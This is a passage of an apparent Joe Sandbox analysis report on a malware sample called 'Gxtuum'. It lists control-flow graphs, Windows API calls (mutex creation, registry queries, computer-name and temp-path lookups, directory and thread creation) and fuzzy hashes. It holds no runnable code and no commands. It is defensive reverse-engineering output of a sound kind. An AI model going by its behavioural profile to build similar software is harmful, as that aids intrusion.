3860 e9997-e999a 3855->3860 3862 e99ec 3857->3862 3858->3822 3863 e95b8-e95c4 3859->3863 3864 e95c9-e95cc 3859->3864 3860->3858 3865 e999c-e99a5 3860->3865 3862->3858 3863->3862 3867 e9974-e9976 3864->3867 3868 e95d2-e95d9 3864->3868 3869 e99cc-e99cf 3865->3869 3870 e99a7-e99ab 3865->3870 3873 e9978-e9982 3867->3873 3874 e9984-e9987 3867->3874 3875 e95df-e9647 call 103730 call e61f0 call 103730 call e61f0 call e6320 3868->3875 3876 e96b9-e995d call 103730 call e61f0 call 103730 call e61f0 call e6320 call 103730 call e61f0 call e91b0 call 103730 call e61f0 call 103730 call e61f0 call e6320 call 103730 call e61f0 call e91b0 call 103730 call e61f0 call 103730 call e61f0 call e6320 call 103730 call e61f0 call e91b0 call 103730 call e61f0 call 103730 call e61f0 call e6320 call 103730 call e61f0 call e91b0 3868->3876 3871 e99dd-e99e9 3869->3871 3872 e99d1-e99db 3869->3872 3877 e99ad-e99b2 3870->3877 3878 e99c0-e99ca 3870->3878 3871->3862 3872->3858 3873->3862 3874->3858 3880 e9989-e9995 3874->3880 3901 e964b-e966b call 11227f 3875->3901 3902 e9649 3875->3902 3913 e9963-e996c 3876->3913 3877->3878 3882 e99b4-e99be 3877->3882 3878->3858 3880->3862 3882->3858 3909 e966d-e967c 3901->3909 3910 e96a2-e96a4 3901->3910 3902->3901 3914 e967e-e968c 3909->3914 3915 e9692-e969f call 10a429 3909->3915 3912 e96aa-e96b4 3910->3912 3910->3913 3912->3913 3913->3860 3917 e996e 3913->3917 3914->3856 3914->3915 3915->3910 3917->3867
                                                                APIs
                                                                • GetVersionExW.KERNEL32(0000011C,455139FB,74DF0F00), ref: 000E944A
                                                                • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 000E94AB
                                                                • GetProcAddress.KERNEL32(00000000), ref: 000E94B2
                                                                • GetNativeSystemInfo.KERNELBASE(?), ref: 000E9573
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: AddressHandleInfoModuleNativeProcSystemVersion
                                                                • String ID:
                                                                • API String ID: 2167034304-0
                                                                • Opcode ID: 939e8551a7bc6d3ac2973aa2b5b67158a0498415620d1ddf40ff8552bbfbc20f
                                                                • Instruction ID: 98c040362c903f103613771e9fd88757afdde81d7e9e490fb51f78630a51472d
                                                                • Opcode Fuzzy Hash: 939e8551a7bc6d3ac2973aa2b5b67158a0498415620d1ddf40ff8552bbfbc20f
                                                                • Instruction Fuzzy Hash: 52C1F671E002449FDF14DF69CC89BADBBB5EF85310F548268E815EB2C6DB749A80CB91

                                                                Control-flow Graph

                                                                APIs
                                                                  • Part of subcall function 000EC6D0: Sleep.KERNELBASE(00000096), ref: 000EC6D6
                                                                  • Part of subcall function 000EC6D0: CreateMutexA.KERNELBASE(00000000,00000000,00147494), ref: 000EC6F4
                                                                  • Part of subcall function 000EC6D0: GetLastError.KERNEL32 ref: 000EC6FC
                                                                  • Part of subcall function 000EC6D0: GetLastError.KERNEL32 ref: 000EC70D
                                                                  • Part of subcall function 000FF750: RegOpenKeyExA.KERNELBASE(80000002,System,00000000,000F003F,?,00000000), ref: 000FF832
                                                                  • Part of subcall function 000FF750: RegCloseKey.KERNELBASE(80000002), ref: 000FF848
                                                                  • Part of subcall function 000E61F0: RegOpenKeyExA.KERNELBASE(?,00000000), ref: 000E67BD
                                                                  • Part of subcall function 000E61F0: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 000E6894
                                                                • CreateThread.KERNELBASE(00000000,00000000,Function_00020F90,00000000,00000000,00000000), ref: 00101166
                                                                • CreateThread.KERNELBASE(00000000,00000000,Function_00021020,00000000,00000000,00000000), ref: 00101177
                                                                • CreateThread.KERNELBASE(00000000,00000000,Function_000210B0,00000000,00000000,00000000), ref: 00101188
                                                                • Sleep.KERNELBASE(00007530), ref: 00101195
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: Create$Thread$ErrorLastOpenSleep$CloseInfoMutexQuery
                                                                • String ID:
                                                                • API String ID: 2192108483-0
                                                                • Opcode ID: 5c8b82c83f91aba404bc22da6582f29a9be4615ab6ee4521390e95646fc95cc5
                                                                • Instruction ID: 2c0d961a3690f5c2fd73a51e9dd3294d9602dec9eede23f2dfedc44161cc19ed
                                                                • Opcode Fuzzy Hash: 5c8b82c83f91aba404bc22da6582f29a9be4615ab6ee4521390e95646fc95cc5
                                                                • Instruction Fuzzy Hash: A0F0E531BD835876F13437A51C07FEA29045B08F91F340112B7A97E5C65EC5358066AF

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 3981 ec6d0-ec707 Sleep CreateMutexA GetLastError 3982 ec71a-ec71b 3981->3982 3983 ec709-ec70b 3981->3983 3983->3982 3984 ec70d-ec718 GetLastError 3983->3984 3984->3982 3985 ec71c-ec723 call 10e34e 3984->3985
                                                                APIs
                                                                • Sleep.KERNELBASE(00000096), ref: 000EC6D6
                                                                • CreateMutexA.KERNELBASE(00000000,00000000,00147494), ref: 000EC6F4
                                                                • GetLastError.KERNEL32 ref: 000EC6FC
                                                                • GetLastError.KERNEL32 ref: 000EC70D
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast$CreateMutexSleep
                                                                • String ID:
                                                                • API String ID: 3645482037-0
                                                                • Opcode ID: ade8812c763ef53770babd2f345cf17e479652776cd2ee90296060dacae73b93
                                                                • Instruction ID: 84fd904e9746cb4e84e9811704acccccaa7ddad30e38ec759e342ff8f066e0c4
                                                                • Opcode Fuzzy Hash: ade8812c763ef53770babd2f345cf17e479652776cd2ee90296060dacae73b93
                                                                • Instruction Fuzzy Hash: 8FE0483410C240EFF7541B79ED4DB1E3A56E790721F680420F645D64F1C76148C18A11

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 3988 ea470-ea50d SHGetFolderPathA call 103730 call e61f0 3993 ea514-ea519 3988->3993 3993->3993 3994 ea51b-ea552 call 104640 call 105b30 3993->3994 3999 ea57f-ea588 3994->3999 4000 ea554-ea563 3994->4000 4003 ea58a-ea599 3999->4003 4004 ea5b5-ea5d1 call 109db0 3999->4004 4001 ea575-ea57c call 10a429 4000->4001 4002 ea565-ea573 4000->4002 4001->3999 4002->4001 4006 ea5d2-ea5d7 call 10f419 4002->4006 4008 ea5ab-ea5b2 call 10a429 4003->4008 4009 ea59b-ea5a9 4003->4009 4008->4004 4009->4006 4009->4008
                                                                APIs
                                                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,455139FB,00000000,?), ref: 000EA4BA
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: FolderPath
                                                                • String ID: 0s==
                                                                • API String ID: 1514166925-3042506011
                                                                • Opcode ID: 46be83078c0a9907b4c3e06dcb7190dbc93fbc533ae69cc3ff2bb222fa2f09ec
                                                                • Instruction ID: c2903e04dc10dcb04da9c4081a8713f529828ed11e695f568ed89eb754ba73c1
                                                                • Opcode Fuzzy Hash: 46be83078c0a9907b4c3e06dcb7190dbc93fbc533ae69cc3ff2bb222fa2f09ec
                                                                • Instruction Fuzzy Hash: CC412571A101589FDB28DB28CC46BEDBBB5EB4A710F5042D9E409A72C1DB756F80CF91

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 4016 f1dd0-f1e6c call f1210 call 103730 call e61f0 4023 f21e7 call e26a0 4016->4023 4024 f1e72-f1ed9 call 105d10 call 105b30 call 103670 4016->4024 4027 f21ec call 10f419 4023->4027 4038 f1edb-f1eea 4024->4038 4039 f1f0a-f1f17 4024->4039 4031 f21f1-f2227 call 10ebb6 call 1036f0 call 103730 4027->4031 4058 f222b-f2243 call 1036f0 call e8700 4031->4058 4041 f1eec-f1efa 4038->4041 4042 f1f00-f1f07 call 10a429 4038->4042 4043 f1f19-f1f28 4039->4043 4044 f1f48-f1f55 4039->4044 4041->4027 4041->4042 4042->4039 4047 f1f3e-f1f45 call 10a429 4043->4047 4048 f1f2a-f1f38 4043->4048 4049 f1f57-f1f66 4044->4049 4050 f1f86-f1fb7 GetModuleFileNameA 4044->4050 4047->4044 4048->4027 4048->4047 4055 f1f7c-f1f83 call 10a429 4049->4055 4056 f1f68-f1f76 4049->4056 4052 f1fc1-f1fc6 4050->4052 4052->4052 4059 f1fc8-f202f call 104640 call 105fc0 4052->4059 4055->4050 4056->4027 4056->4055 4070 f2246-f2248 call 10e34e 4058->4070 4071 f2068-f206f 4059->4071 4072 f2031-f203c 4059->4072 4081 f224d-f2252 call 10f419 4070->4081 4073 f2146-f2149 4071->4073 4074 f2075-f2091 call 10e5d0 4071->4074 4076 f203e-f204c 4072->4076 4077 f2052-f2062 call 10a429 4072->4077 4079 f214b-f2156 4073->4079 4080 f2176-f219a 4073->4080 4074->4031 4090 f2097-f20a4 call e9ed0 4074->4090 4076->4077 4076->4081 4077->4071 4086 f216c-f2173 call 10a429 4079->4086 4087 f2158-f2166 4079->4087 4084 f219c-f21ab 4080->4084 4085 f21cb-f21e6 call 109db0 4080->4085 4091 f21ad-f21bb 4084->4091 4092 f21c1-f21c8 call 10a429 4084->4092 4086->4080 4087->4081 4087->4086 4102 f20ba-f20c7 call e9ed0 4090->4102 4103 f20a6-f20b4 call 1035a0 CreateDirectoryA 4090->4103 4091->4081 4091->4092 4092->4085 4108 f20fa-f2107 call e9ea0 4102->4108 4109 f20c9-f20f7 call 103730 call ea8c0 call f1080 4102->4109 4103->4102 4108->4070 4114 f210d-f2141 call 1036f0 call 103730 4108->4114 4109->4108 4114->4058
                                                                APIs
                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,00000000,?,7FFFFFFF,?,?,0013DC20,00000001), ref: 000F1F94
                                                                • CreateDirectoryA.KERNEL32(00000000,00000000,?,?,?,?), ref: 000F20B4
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: CreateDirectoryFileModuleName
                                                                • String ID:
                                                                • API String ID: 3341437400-0
                                                                • Opcode ID: a4d636850c926f6e987e0249f1cc23f9315c95b7d149c2537295ec98519cff87
                                                                • Instruction ID: a6d2f1ae0e8a368949cb79a838710c7423729df9703d6975d01bf40f9e60ce4a
                                                                • Opcode Fuzzy Hash: a4d636850c926f6e987e0249f1cc23f9315c95b7d149c2537295ec98519cff87
                                                                • Instruction Fuzzy Hash: A5C11171A002589BDF29EB28CC4ABEDBB75AF56300F8041D8E548A76D2DB715F84CF91
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 52d5ac9662920d089a2536f90c479d9828bd06572b232e6de9a852d2dffc9c50
                                                                • Instruction ID: 843a9f2de8f4cbdd9387140b3a63e17f982b3129c42ff45b0996905064cca0e7
                                                                • Opcode Fuzzy Hash: 52d5ac9662920d089a2536f90c479d9828bd06572b232e6de9a852d2dffc9c50
                                                                • Instruction Fuzzy Hash: FF210631D04208BAEB16AB649C42FDE7729AF41378F240334F9642B1D1DBF15D82D665
                                                                APIs
                                                                • FileTimeToSystemTime.KERNEL32(00000000,?,?,?,?,00110CA3,?,?,00000000,00000000), ref: 00110D9A
                                                                • SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?,?,?,?,00110CA3,?,?,00000000,00000000), ref: 00110DAE
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: Time$System$FileLocalSpecific
                                                                • String ID:
                                                                • API String ID: 1707611234-0
                                                                • Opcode ID: 9e18f7377159b01a24bebab31729e05c3406d37b36e63da22393c013a126acf1
                                                                • Instruction ID: 01ce406d891a8509e28388aa0a6821a5d4a25ce2d58dd97c4a9fadad46b1ccbf
                                                                • Opcode Fuzzy Hash: 9e18f7377159b01a24bebab31729e05c3406d37b36e63da22393c013a126acf1
                                                                • Instruction Fuzzy Hash: 8C11E87690020CABCF15DFE4D985AEF77BDAB0C310F504266E516E2181EB70EA858BA1
                                                                APIs
                                                                • GetComputerNameExW.KERNEL32(00000002,?,?,455139FB,74DF0F00), ref: 000EB2A6
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: ComputerName
                                                                • String ID:
                                                                • API String ID: 3545744682-0
                                                                • Opcode ID: 45ff75b61d478f834eb44de400b13d2036cc1ca1dd8f71cade780d9073ce242b
                                                                • Instruction ID: ec07a17044f580bde56ed1249f794732e115b1e73e525f42efd14c580bd3fbf0
                                                                • Opcode Fuzzy Hash: 45ff75b61d478f834eb44de400b13d2036cc1ca1dd8f71cade780d9073ce242b
                                                                • Instruction Fuzzy Hash: CD5190B19012699FCB20DF64DCC87DEB7B4AF58314F1002D9D819A7291DB74AB80CF91
                                                                APIs
                                                                • GetTempPathA.KERNELBASE(00000104,?,455139FB,?,00000000), ref: 000EA2B7
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: PathTemp
                                                                • String ID:
                                                                • API String ID: 2920410445-0
                                                                • Opcode ID: 01db97be6eef4df99130a7969ca84320415bf64564622e9e45a85fb3e5e562fa
                                                                • Instruction ID: fadf7391cf46bd64dcc875a187f6dd0b832536481c68b3a987f6aa05157276ad
                                                                • Opcode Fuzzy Hash: 01db97be6eef4df99130a7969ca84320415bf64564622e9e45a85fb3e5e562fa
                                                                • Instruction Fuzzy Hash: 7851B471A001589FDB28DB28CD497DDB7B5EB8A300F4081D8E449A72C2DBB56F84CF91
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 315a8745e3546c021b2108a0af610391cd5090da7c913afa99fd8668eaed7bf6
                                                                • Instruction ID: 133dc872141d022beb8d60e7e819f298f6e2fae5511203ac6dc7aee4865eed86
                                                                • Opcode Fuzzy Hash: 315a8745e3546c021b2108a0af610391cd5090da7c913afa99fd8668eaed7bf6
                                                                • Instruction Fuzzy Hash: A32198B5C0031967CB24AB759C4ADDF7ABCDF51764F114279F864E3192EB30CE858A90
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: __wsopen_s
                                                                • String ID:
                                                                • API String ID: 3347428461-0
                                                                • Opcode ID: af29e7063bd5b15ffc32cff9fb947787f1298b7cab85539733ea274abc060369
                                                                • Instruction ID: e656698a11c7c8cd05837d37a9f580494f7d56244e6dfd39857d09c0be642de5
                                                                • Opcode Fuzzy Hash: af29e7063bd5b15ffc32cff9fb947787f1298b7cab85539733ea274abc060369
                                                                • Instruction Fuzzy Hash: 18113375A0420AAFCB09DF58E94199A7BF4EF48304B104069F808AB351D730EA11CBA4
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: _free
                                                                • String ID:
                                                                • API String ID: 269201875-0
                                                                • Opcode ID: 5806a22f12cb4afe1abbd2cb36b595270268b3ae57944d2dda9f9ec6912ba8be
                                                                • Instruction ID: 6fc03a1d700c949944672d3e95a643c3f40182a8fd9c468bb5fa155e312ad6e0
                                                                • Opcode Fuzzy Hash: 5806a22f12cb4afe1abbd2cb36b595270268b3ae57944d2dda9f9ec6912ba8be
                                                                • Instruction Fuzzy Hash: BA015E72D04209AEDF06ABA8A802BDD7BE5AF58310F144166F914E21D1EBB18AC0C790
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: _free
                                                                • String ID:
                                                                • API String ID: 269201875-0
                                                                • Opcode ID: 5bf193fee8e13bd601411da2ac5b93692fa8ed646d5c05a249e26dc7ca1745e2
                                                                • Instruction ID: f99d5acce00bc02b003660d0f9edb3a7efe5171e5140e2411232f5134946b35d
                                                                • Opcode Fuzzy Hash: 5bf193fee8e13bd601411da2ac5b93692fa8ed646d5c05a249e26dc7ca1745e2
                                                                • Instruction Fuzzy Hash: 18014F72C00159AFCF01AFA89C019EEBFF5BF58310F154565F924E21A1E7358B64DB91
                                                                APIs
                                                                • RtlAllocateHeap.NTDLL(00000000,00100FD7,?,?,0010A1C2,00100FD7,?,001037BE,8B18EC84,74DF0F00), ref: 00118807
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: AllocateHeap
                                                                • String ID:
                                                                • API String ID: 1279760036-0
                                                                • Opcode ID: 4d782d0598515e826afb8d8e960d13afac739aefd6ad7ab81b5a6df101a934d4
                                                                • Instruction ID: f862d0408f9849609a313e5a3eea4bfa8f23159689b61c621a421287b4a2ac3b
                                                                • Opcode Fuzzy Hash: 4d782d0598515e826afb8d8e960d13afac739aefd6ad7ab81b5a6df101a934d4
                                                                • Instruction Fuzzy Hash: 91E02232205220ABDA3C27B6AC00BDB7A49AF11BF0F658130FC18964D0CF65CCC182E6
                                                                APIs
                                                                • CreateFileW.KERNELBASE(00000000,00000000,?,00123F38,?,?,00000000,?,00123F38,00000000,0000000C), ref: 00123B65
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: CreateFile
                                                                • String ID:
                                                                • API String ID: 823142352-0
                                                                • Opcode ID: 57df52ae38886957ef54720ec50450988ded0bb59db358c7a1bf7a4b65b28745
                                                                • Instruction ID: 474692a30cdaaaa622155c592c2639e62ab2c25205be2cbb363ee607f52fed58
                                                                • Opcode Fuzzy Hash: 57df52ae38886957ef54720ec50450988ded0bb59db358c7a1bf7a4b65b28745
                                                                • Instruction Fuzzy Hash: 77D06C3200010DBFEF028F84DD06EDA3FAAFB48714F014000BA1856420C732E861AB90
                                                                APIs
                                                                  • Part of subcall function 000E61F0: RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,455139FB,455139FB), ref: 000E639C
                                                                  • Part of subcall function 000E61F0: RegQueryValueExA.KERNELBASE(455139FB,?,00000000,00000000,?,00000400,?,?,00000000,00000001,455139FB,455139FB), ref: 000E63CA
                                                                  • Part of subcall function 000E61F0: RegCloseKey.KERNELBASE(455139FB,?,?,00000000,00000001,455139FB,455139FB), ref: 000E63D6
                                                                • Sleep.KERNELBASE ref: 001010A5
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: CloseOpenQuerySleepValue
                                                                • String ID:
                                                                • API String ID: 4119054056-0
                                                                • Opcode ID: 17363584cb66698ed476c4892c4a370a26071ab77fcb55ba48e02e12812a5ec0
                                                                • Instruction ID: c8b82ceebcd61ca51804324069085842c28cbcf60abdf6e4c922a4ac79885553
                                                                • Opcode Fuzzy Hash: 17363584cb66698ed476c4892c4a370a26071ab77fcb55ba48e02e12812a5ec0
                                                                • Instruction Fuzzy Hash: 17F0F4B5A00684ABC701BB6CDD0375EBBA9EB12B60F440398F8216B2E7DB711A0447D3
                                                                APIs
                                                                  • Part of subcall function 000E61F0: RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,455139FB,455139FB), ref: 000E639C
